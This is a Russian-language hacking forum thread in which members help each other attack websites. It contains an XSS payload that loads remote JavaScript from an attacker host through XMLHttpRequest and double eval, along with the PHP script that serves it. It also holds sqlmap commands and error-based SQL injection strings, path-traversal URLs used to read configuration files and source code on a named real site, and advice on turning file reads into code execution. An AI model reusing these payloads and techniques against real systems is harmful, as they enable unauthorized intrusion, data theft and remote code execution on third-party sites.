Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    106
    Likes Received:
    128
    Reputations:
    46
    HTML:
    <img name="xhr=new XMLHttpRequest();xhr.open('GET','https:/host/script.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" src="" />
    нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада

    содержимое самого php:
    PHP:
    <?php

    header
    ("Access-Control-Allow-Origin: *");
    echo 
    file_get_contents("payload.js");

    ?>
     
    #2241 dmax0fw, 6 Feb 2018
    Last edited: 6 Feb 2018
    cat1vo and crlf like this.
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Не хочет
    Code:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p>
    s.php
    Code:
    <?php
    
    header("Access-Control-Allow-Origin: *");
    echo file_get_contents("alert.js");
    
    ?>
    http://host/images/s/s.php
    Code:
    alert("1");
     
  3. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    106
    Likes Received:
    128
    Reputations:
    46
    HTML:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p>
    нужно дважды евалить
    HTML:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" /></p>
    первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload
     
    Octavian likes this.
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Вопрос по SQL injection
    Code:
    GET /getaddr.cgi?heataccount=%5c
    [​IMG]
    Code:
     -u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
    Code:
     -u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
    
    Не катит он тупа не видит
    Как раскрутить кто знает ?
     
  5. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,298
    Likes Received:
    10,122
    Reputations:
    115
    Руками может?
     
    cat1vo likes this.
  6. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    298
    Likes Received:
    141
    Reputations:
    2
    level=5 попробуй в мапе, ну и руками error based вектор пробуй.
    Code:
    /getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
    /getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
    
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,070
    Likes Received:
    1,555
    Reputations:
    41
    100500 waf
     
  8. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,298
    Likes Received:
    10,122
    Reputations:
    115
    Try boolean-based via more than 1 row )
     
  9. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  10. MotherHacker

    MotherHacker New Member

    Joined:
    14 Oct 2017
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
  11. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.

    Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
    Code:
    https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
    Что нашел:
    - конфиг мускула
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
    - конфиг фтп
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
    - логи фтп (не нашел подключения)
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
    Что не могу найти:
    - логи апача
    - способ залиться
     
  12. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    чёт не фурычит сайт )
     
  13. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    С СНГ IP может не пускать.

    Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)
     
  14. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    538
    Likes Received:
    1,002
    Reputations:
    333
    Ниразу не LFI, это читалка. На чтение логов нет прав.
     
    z3u5 and ms13 like this.
  15. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера.
    Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
     
  16. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,298
    Likes Received:
    10,122
    Reputations:
    115
    код должен выполняться?
     
    z3u5 likes this.
  17. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты?
    Я не в теме, пишу без наездов, вам все кажется.
     
  18. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    538
    Likes Received:
    1,002
    Reputations:
    333
    С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:

    Code:
    Content-Disposition: inline; filename=""
    Content-Length: 0
    Connection: close
    Content-Type: image/jpeg
    
    Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.

    Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.
     
    z3u5 likes this.
  19. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    538
    Likes Received:
    1,002
    Reputations:
    333
    Либо прочитать любой PHP скрипт :D

    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../index.php
    
     
    z3u5 likes this.
  20. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?
     
Loading...